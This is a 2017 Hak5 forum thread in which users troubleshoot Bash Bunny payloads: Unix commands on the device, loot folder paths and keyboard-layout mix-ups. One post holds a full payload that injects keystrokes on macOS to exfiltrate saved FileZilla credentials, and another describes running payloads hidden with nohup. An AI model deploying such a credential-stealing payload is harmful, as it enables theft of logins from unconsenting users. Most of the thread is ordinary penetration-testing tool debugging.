quentin_lamamy Posted July 23, 2017 (edited)

Hi there, I have a little question. I love my Bash Bunny and create a lot of payloads (I will post them when really finished), but I still have some questions. Actually, for all my payloads I open a terminal, minimize it and do my stuff. When I look at this kind of payload, on line 24 there is a Unix command, "mkdir". So, is it possible to use Unix commands without a terminal?

Reminder for people who read this topic, working Unix commands in payloads:

    mkdir
    source
    export

Edited July 26, 2017 by quentin.lamamy

PoSHMagiC0de Posted July 23, 2017

Nope. That is making the folders on the local BB to gather the loot in.

quentin_lamamy (Author) Posted July 24, 2017

But it's a nix command? It's a custom function interpreted by the BB to create a folder only on the BB? If yes, it's not a good choice to keep the same function name.

Dave-ee Jones Posted July 24, 2017

Yes, many *Unix commands are supported by the Bash Bunny because it is a Linux box.

    mkdir
    chmod
    mv
    cd
    man
    rmdir
    rm

There are lots..

quentin_lamamy (Author) Posted July 24, 2017

> 10 minutes ago, Dave-ee Jones said:
> Yes, many *Unix commands are supported by the Bash Bunny because it is a Linux box. mkdir chmod mv cd man rmdir rm There are lots..

Is there a list somewhere? I can't find this information on the wiki.

Dave-ee Jones Posted July 24, 2017

> 1 hour ago, quentin.lamamy said:
> Is there a list somewhere? I can't find this information on the wiki.

That's because it's not on the Wiki. Think about it - the Bash Bunny is a Linux computer in a USB, therefore it uses bash/sh, meaning any bash/sh commands will work (well, most of them, at least). Therefore just Google stuff like this..

quentin_lamamy (Author) Posted July 24, 2017

Thanks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that the BB is a Linux computer in a USB key, it's enough. I don't need help to know the command list available on Unix, and I don't need your disdain.

Dave-ee Jones Posted July 24, 2017 (edited)

> 56 minutes ago, quentin.lamamy said:
> Thanks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that the BB is a Linux computer in a USB key, it's enough. I don't need help to know the command list available on Unix, and I don't need your disdain.

I wasn't disrespecting you, sorry if it seemed that way. You asked for a command list after I stated that the BB was a Linux box on a stick, so I just helped point you in the right direction - Google a list of commands. :) Hope it helped in the end.

While I said that you can find a list of commands, I also said that some may not work (most will work), so the best way to find out is to test them. Obviously don't do commands that may brick your Bunny or break something..

Edited July 24, 2017 by Dave-ee Jones

quentin_lamamy (Author) Posted July 24, 2017 (edited)

Ok, hoist the white flag xD

I just tried this command

    mkdir -p /root/udisk/loot/exfiltration

nothing, no folder, a total void ^^ but if I use this command

    Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration
    Q ENTER

it works \o/

For me it's the same, I just want to understand where my mistake is. Thanks

Edited July 24, 2017 by quentin.lamamy

Dave-ee Jones Posted July 24, 2017 (edited)

Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?

In regards to your first try, "/root/udisk" doesn't actually refer to your USB storage while in Arming mode. However, if you decided to write a payload that did this..

    LED Y                                        # Make LED yellow to start
    mkdir -p "/root/udisk/loot/exfiltration"     # Makes the directory
    if [ -d "/root/udisk/loot/exfiltration" ]    # Checks for the directory
    then
        LED G                                    # If the directory exists turn the LED green
    fi

And then went back into Arming mode, you will notice the folder is there. Also, the LED should have gone green during the payload too.

Also, your code did work however you just can't see the directory in the USB storage. If you check for that directory (or even 'cd' to it) in the serial console where you called it you will notice it actually does exist. It's a bit weird how it works - you just have to think of USB storage and 'udisk' as 2 different things. You can use the "udisk mount" and "sync" commands to sync the 'udisk' and USB storage.

EDIT: I did the same thing you did (created the directory in the serial console), then rebooted my Bunny and the folder was there in USB storage. I would say you need to sync it before you try and access it on USB storage.

Edited July 24, 2017 by Dave-ee Jones

quentin_lamamy (Author) Posted July 24, 2017 (edited)

> 20 minutes ago, Dave-ee Jones said:
> Where are you posting the Ducky script? In your SSH/Serial shell for the Bunny or..?

It's just in my switch1 folder like any other payload (not in the serial console).

And I tested this weird path because I saw it in this payload (when I don't have enough documentation or data, I try to learn from the existing scripts). But it seems that it's not the good way to create a folder (before moving files inside during exfiltration).

Edited July 24, 2017 by quentin.lamamy

Dave-ee Jones Posted July 24, 2017

> 1 minute ago, quentin.lamamy said:
> It's just in my switch1 folder like any other payload (not in the serial console). And I tested this weird path because I saw it in this payload (when I don't have enough documentation or data, I try to learn from the existing scripts). But it seems that it's not the good way to create a folder (before moving files inside during exfiltration).

Aha, that's how everyone learns :P But did it work for you? You may have to play around a bit for it to update live in Windows Explorer, but using it in a payload works fine. E.g. I can create a folder using "mkdir -p" and put/get files from it as I need, it just doesn't show the folder in Windows Explorer initially - you would have to sync it and "udisk mount" (don't quote me on the mounting part - I'm not actually sure how that works, I did once upon a time when I needed to use it for a payload but now I've forgotten).

PoSHMagiC0de Posted July 24, 2017

I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there.

Summary. The BB is an Arm machine running Linux. It has its root partition that it boots from and a nang (I think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are run from. For the payloads themselves there are helper functions to get you the IP address of the bunny and clients, switch position, and hostnames. The wiki has their uses.

I looked in the past for a way to run my payloads hidden in Linux and found a way but it works best when the payload is encompassed into a script, i.e. python, perl, bash, whatever. The key here is the nohup command in Linux. I do not know if it is there in MacOS but I have always seen it in Linux. If I use it like so against my payload script it will be:

    nohup bash ./myscript.sh &
    exit

nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.not file.

I have found that while prethinking of a way to make an agent run hidden on Linux, since I had no takers on writing the python agent for the BBTPS for Linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for Windows).

quentin_lamamy (Author) Posted July 24, 2017

Well... thanks, but what is the link with the question? ^^

Dave-ee Jones Posted July 24, 2017

> 6 hours ago, PoSHMagiC0de said:
> I spent all weekend looking through those payloads figuring out which one I should update. I got overwhelmed. Going to just need people to suggest which one needs looking over the most and start there.
>
> Summary. The BB is an Arm machine running Linux. It has its root partition that it boots from and a nang (I think it is called that) that is usually mapped as udisk for payloads and exfiltrated data. If you make a payload with just a network connection you can ssh into it and explore it. The BB comes with some helpers for you. Like in the shell it has the udisk command to mount and format the partition that is mounted and payloads are run from. For the payloads themselves there are helper functions to get you the IP address of the bunny and clients, switch position, and hostnames. The wiki has their uses.
>
> I looked in the past for a way to run my payloads hidden in Linux and found a way but it works best when the payload is encompassed into a script, i.e. python, perl, bash, whatever. The key here is the nohup command in Linux. I do not know if it is there in MacOS but I have always seen it in Linux. If I use it like so against my payload script it will be: nohup bash ./myscript.sh & exit
>
> nohup keeps your script from closing when you close the terminal. Of course you can only see the process in "top", if it is still running. It also writes all output to a nohup.not file.
>
> I have found that while prethinking of a way to make an agent run hidden on Linux, since I had no takers on writing the python agent for the BBTPS for Linux and OSX, I am going to have to do it as soon as I figure out how to run a separate process from python detached from the current python instance (like start-process in powershell for Windows).

That doesn't sound like it has anything to do with this guy's question..

quentin_lamamy (Author) Posted July 24, 2017

Here is the result of some tests.

TEST 1: Print the command in the shell and press enter

    rootDir=/Volumes/BashBunny
    lootDir=$rootDir/loot/exfiltration/
    [...]
    Q STRING mkdir -p $lootDir
    Q ENTER

The result: no folder creation, and this result in the console

    bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/
    mkdir: §p: File exists

Why this error? I don't know, because the file doesn't exist. And why does my mkdir -p become mkdir: §p?

Dave-ee Jones Posted July 25, 2017 (edited)

Okay, your keyboard language and Bunny language need to be the same. So whatever you use (us, fr, etc.) needs to be set on both systems. Using the command:

    DUCKY_LANG us

should fix the Bunny up. Just set the Bunny's language to whatever the PC's language is. There's a list of supported languages in the 'language' folder on the Bunny's USB storage.

Now, in regards to the "folder exists" error, it means the folder exists ( :P ). The USB storage may not show it, but on the Bunny it exists. Why are you using Ducky script to write the command? What are you writing the command into?

Did you try my quick payload to see if it is working?

> 18 hours ago, Dave-ee Jones said:
>
>     LED Y                                        # Make LED yellow to start
>     mkdir -p "/root/udisk/loot/exfiltration"     # Makes the directory
>     if [ -d "/root/udisk/loot/exfiltration" ]    # Checks for the directory
>     then
>         LED G                                    # If the directory exists turn the LED green
>     fi

Edited July 25, 2017 by Dave-ee Jones

quentin_lamamy (Author) Posted July 25, 2017

Yes, here is my complete payload header

    LED SETUP
    rootDir=/Volumes/BashBunny
    lootDir=$rootDir/loot/exfiltration/
    DUCKY_LANG fr
    GET SWITCH_POSITION
    ATTACKMODE HID STORAGE

Dave-ee Jones Posted July 25, 2017 (edited)

You can see all the files on USB storage when you do this in the serial console:

    udisk mount       # unlocks USB storage in console
    cd /root/udisk/   # go to the USB storage
    ls                # lists all the files/folders in the current directory

Just tested that, works good. From there you can "mkdir" and stuff, then call "sync" at the end and everything updates fine, after you've rebooted.

You may also notice that everything works fine in a normal payload, you wouldn't normally have to do a udisk mount and a sync everytime. You can write to a file in the loot directory and once the payload has completed, just call "sync" and once the payload has finished go back to arming mode and your exfiltration stuff is sitting right there.

Edited July 25, 2017 by Dave-ee Jones

quentin_lamamy (Author) Posted July 25, 2017 (edited)

Just tried, and yes, tadaa, I have my folder, but in my case it doesn't work?

    #!/bin/bash
    #
    # Bash Bunny by Hak5 - USB Attack/Automation Platform
    #
    # Title:        Filezilla credential exfiltration
    # Author:       Quentin Lamamy <contact@quentin-lamamy.fr>
    # Description:  Exfiltrate filezilla credential
    # Version:      1.0
    # Platform:     OSX

    #####################
    # Setup the payload #
    #####################
    LED SETUP
    rootDir=/Volumes/BashBunny
    lootDir=$rootDir/loot/exfiltration/filezilla
    DUCKY_LANG fr
    GET SWITCH_POSITION
    ATTACKMODE HID STORAGE

    #####################
    # Attack the target #
    #####################
    LED ATTACK
    Q CTRL SPACE
    Q STRING terminal
    Q ENTER
    Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh
    Q ENTER
    Q STRING shell.init
    Q ENTER
    Q STRING mkdir -p $lootDir
    Q ENTER
    Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh;
    Q ENTER
    Q STRING filezilla.exfiltration $lootDir
    Q ENTER
    #Q STRING clear
    #Q ENTER
    QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh
    QUACK ENTER
    # Close terminal
    #QUACK STRING killall Terminal
    #QUACK ENTER
    LED FINISH

    # Find further documentation, repository of payloads, tutorial videos and
    # community support forums at bashbunny.com. (C) Hak5 LLC

The output:

    cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory

It's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work, no?

Edited July 25, 2017 by quentin.lamamy

Dave-ee Jones Posted July 25, 2017 (edited)

I don't understand why you are Ducky scripting your "mkdir", you don't need to. The Bash Bunny is a Linux box, therefore saying

    mkdir -p $lootDir

says "Make a directory in this folder called this: 'exfiltration'". However, doing it like you are doing it

    Q STRING mkdir -p $lootDir

is just writing that in a selected textbox. So unless the selected textbox is a SSH/Serial console in the Bunny this isn't going to work. So it is in a Terminal, therefore this COULD work however you must remember that any command you make is being executed on your PC, not the Bunny. I don't have a Mac so I can't test this or see anything that may be wrong with your Terminal stuff.

Nowhere does it show Quentin_Sitemanager.xml being created so I am assuming that is in one of your *.sh files? You should look at those. Also, check to make sure that filezillaExfiltration.sh is actually being run - sourcing it might run it and then calling it might run it again. The second time you've called it it might not run correctly because it has to be executable. You should make the *.sh files log to another file, giving you regular updates of what is happening.

Edited July 25, 2017 by Dave-ee Jones

quentin_lamamy (Author) Posted July 25, 2017

Yes, I know it sucks to do it this way, now I use /root/udisk. At the moment I have tested 2 Unix commands that work, mkdir and source.

Dave-ee Jones Posted July 25, 2017

Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P

quentin_lamamy (Author) Posted July 26, 2017 (edited)

> 21 hours ago, Dave-ee Jones said:
> Okay, that's good news. You might notice you can do other things like for loops, while loops, switches, etc. Normal Bash programming stuff :P

Yes, all these classic commands will work. I try all the "uncommon" commands and test them to help the future BB noobs like me.

Next Unix command test: export

    export FOO="BAR"
    Q STRING $FOO             # Will print, as expected, BAR in the current focused window
    export PS1="bashbunny>"   # Will do nothing

I have a little idea of why it doesn't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the currently opened terminal. I used to succeed in making this work with Q STRING and Q ENTER, but now it sucks with some encoding issue

    # Print this command in terminal in order to be in the "good scope"
    Q STRING "export PS1='bashbunny >'"
    Q ENTER

but the unexpected result is

    export PS1-'bashbunny #'

Encoding problem solved with a new OSX keyboard layout.

Edited July 26, 2017 by quentin.lamamy

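Why `-p` arrived as `§p` and `PS1=` as `PS1-` in the tests above, modelled as an added example that is not code from the thread. It assumes the Bunny's `fr` layout sends PC AZERTY key positions while macOS decodes them with Apple's French layout; the table and function names are hypothetical.

```python
# Added illustration, not code from the thread. A HID device sends key
# positions, not characters; the host's layout decides what each one means.
# Both tables are assumptions and list only keys where the layouts differ.

# Device side: character -> (physical key, shift) on PC AZERTY.
# Keys are named by their US legend; "ISO" is the extra key beside left shift.
PC_AZERTY = {
    "-": ("6", False),
    "_": ("8", False),
    "=": ("EQUAL", False),
    "+": ("EQUAL", True),
    "!": ("SLASH", False),
    ">": ("ISO", True),
}

# Host side: (physical key, shift) -> character on Apple's French layout.
MAC_FRENCH = {
    ("6", False): "§",
    ("8", False): "!",
    ("EQUAL", False): "-",
    ("EQUAL", True): "_",
    ("SLASH", False): "=",
    ("ISO", True): "#",  # taken from the output quoted in the thread
}


def typed_on_host(command, device=PC_AZERTY, host=MAC_FRENCH):
    """Return the text the host sees when the device types `command`."""
    out = []
    for ch in command:
        stroke = device.get(ch)
        # Characters absent from the table sit on the same key in both layouts.
        out.append(host[stroke] if stroke in host else ch)
    return "".join(out)


def mangled(command, device=PC_AZERTY, host=MAC_FRENCH):
    """List (position, sent, received) for every character that changes."""
    seen = typed_on_host(command, device, host)
    return [(i, a, b) for i, (a, b) in enumerate(zip(command, seen)) if a != b]


# The two commands typed with Q STRING in the thread.
TEST_MKDIR = "mkdir -p /Volumes/BashBunny/loot/exfiltration/"
TEST_EXPORT = "export PS1='bashbunny >'"

if __name__ == "__main__":
    for cmd in (TEST_MKDIR, TEST_EXPORT):
        print(f"sent:     {cmd}")
        print(f"received: {typed_on_host(cmd)}")
        print(f"changed:  {mangled(cmd)}")
```
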
PoSHMagiC0de Posted July 26, 2017

So...you don't want to run unix commands without a terminal?